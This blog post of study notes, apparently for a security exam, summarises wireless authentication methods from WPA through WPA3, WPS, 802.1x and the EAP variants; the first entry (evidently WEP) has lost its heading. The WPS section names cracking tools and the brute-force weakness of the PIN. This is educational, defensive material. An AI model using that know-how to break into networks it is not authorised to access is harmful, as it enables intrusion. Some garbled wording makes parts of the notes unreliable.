WIRELESS AUTHENTICATION METHODS
These
authenticate the device only. These devices do not use TLS as this is only used
with certificates. Do not use a username only a password (PSK).
· Built on RC4 – uses a
24-bit IV – PSK (Pre-Shared Key)
· Prone to IV (Initialization
Vector) attack
WPA
(Wi-Fi Protected Access)
· Built on RC4 – uses
TKIP (Temporal Key Integrity Protocol)
· Personal Mode (PSK) or
Enterprise Mode (with RADIUS)
· The PSK is prone to
brute force attacks
WPA2
(Wi-Fi Protected Access 2)
· Built on AES – uses
CCMP
· Personal Mode (PSK) or
Enterprise Mode (with RADIUS)
· The PSK is prone to brute
force attacks
· AES replaced RC4, CCMP
replaced TKIP
WPA3
(Wi-Fi Protected Access 3)
- Built on GCMP-256 (Galois/Counter Mode Protocol)
- Replaces PSK with SAE (Simultaneous Authentication of Equals)
WPS
(Wi-Fi Protected Setup)
- Connection normally used with a pushbutton
- If there is no push button, use the 8-digit PIN on the bottom of the AP
- Prone to a brute force attack, can be broken in less than 11,000 attempt
- Tools used for cracking WPS: Reaver, Wifite, Wash
The following
authenticate the user and require certificates. When using certificates you
must use TLS.
Enterprise Mode / 802.1x Authentication
- Using this method requires a RADIUS server
- Authentication can be accomplished with a username & password, smart card, or token
- Authentication is used against an enterprise directory service / AAA server / RADIUS
- 802.1x requires a Supplicant, Authenticator, and Authentication server (AAA / RADIUS)
EAP-TLS
(Extensible Authentication Protocol-Transport Layer Security)
- Certificates required on both the server and wireless device (Supplicant)
- Provides mutual authentication
- Authenticates the user – uses an enterprise directory service
EAP-TTLS
(Extensible Authentication Protocol – Tunneled Transport Layer Security)
- Certificate on the server only
- Authenticates the user - uses an enterprise directory service
- End-to-end protection of authentication credentials
PEAP
(Protected Extensible Authentication Protocol)
- Certificate on the server only
- Uses TLS
- Authenticates the user – uses an enterprise directory service
- End-to-end protection of authentication credentials
The following
authenticate the user and do not use certificates
LEAP
(Lightweight Extensible Authentication Protocol)
- Does not require certificates
- Replaced with EAP-FAST
EAP-FAST
(Flexible Authentication via Secure Tunneling)
- Does not use certificates
- Replaced LEAP
The following
is RADIUS federation
Multiple
organizations allow access to one another’s users
Uses
the native 802.1x client (Supplicant)
Each
organization has a RADIUS server and joins a mesh
No comments:
Post a Comment